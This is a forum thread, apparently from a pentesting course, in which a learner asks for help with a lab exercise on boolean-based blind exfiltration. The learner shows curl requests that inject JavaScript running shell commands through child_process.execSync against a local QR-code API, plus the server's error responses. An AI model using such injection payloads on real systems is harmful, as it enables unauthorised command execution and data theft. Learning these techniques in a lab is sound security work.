Intro to Whitebox Pentesting: Blind Exploitation

HTB Content Academy
1

For this section I need to do the following:
Challenge: Try to use what you learned in this section to reached boolean-based exfiltration using the exercise from the previous section, in which this would be possible. Instead of sleeping, you may send a different HTTP response code (e.g. 200 for match and 404 for fail). This would make you thoroughly understand how both techniques work, and how they differ from each other.

The flag at ‘/flag.txt’ consists of 3 digits. Try to use the payload from this section to find them, by iterating over [0-9] for each of the 3 digits (max 30 attempts needed)

Can someone help to solve this? This is what I have done so far: PrivateBin

5

I thought I solved it, but I still don’t understand how to do boolean-based exfiltration?

Create a local file flag.txt.

Tested with letter a to check the first letter from file flag.txt:

$ curl -i -s -X POST -H "Content-Type: application/json" -H "Authorization: bearer <toke>" -d '{ "text": "'\''}) + (function(){ var c = require(\"child_process\").execSync(\"ls | sort | cut -c1\").toString().trim(); if (c === \"a\") { return \"test\"; } else { throw \"fail\"; } })()//" }' http://localhost:5000/api/service/generate
HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 41
ETag: W/"29-vrivKbD3JnWI58RmWDGTwvyZnls"
Date: Mon, 12 May 2025 14:50:03 GMT
Connection: keep-alive
Keep-Alive: timeout=5

{"message":"Could not generate QR code."}

$ curl -i -s -X POST -H "Content-Type: application/json" -H "Authorization: bearer <toke>" -d '{ "text": "'\''}) + (function(){ var c = require(\"child_process\").execSync(\"ls | sort | cut -c1\").toString().trim(); if (c === \"f\") { return \"test\"; } else { throw new Error(\"fail\"); } })()//" }' http://localhost:5000/api/service/generate
HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 41
ETag: W/"29-vrivKbD3JnWI58RmWDGTwvyZnls"
Date: Mon, 12 May 2025 14:50:44 GMT
Connection: keep-alive
Keep-Alive: timeout=5

{"message":"Could not generate QR code."}

Get always HTTP/1.1 500 Internal Server Error

6

anyone?

7

Here is also https://pastebin.com/6P1X3whR for more information from what I did.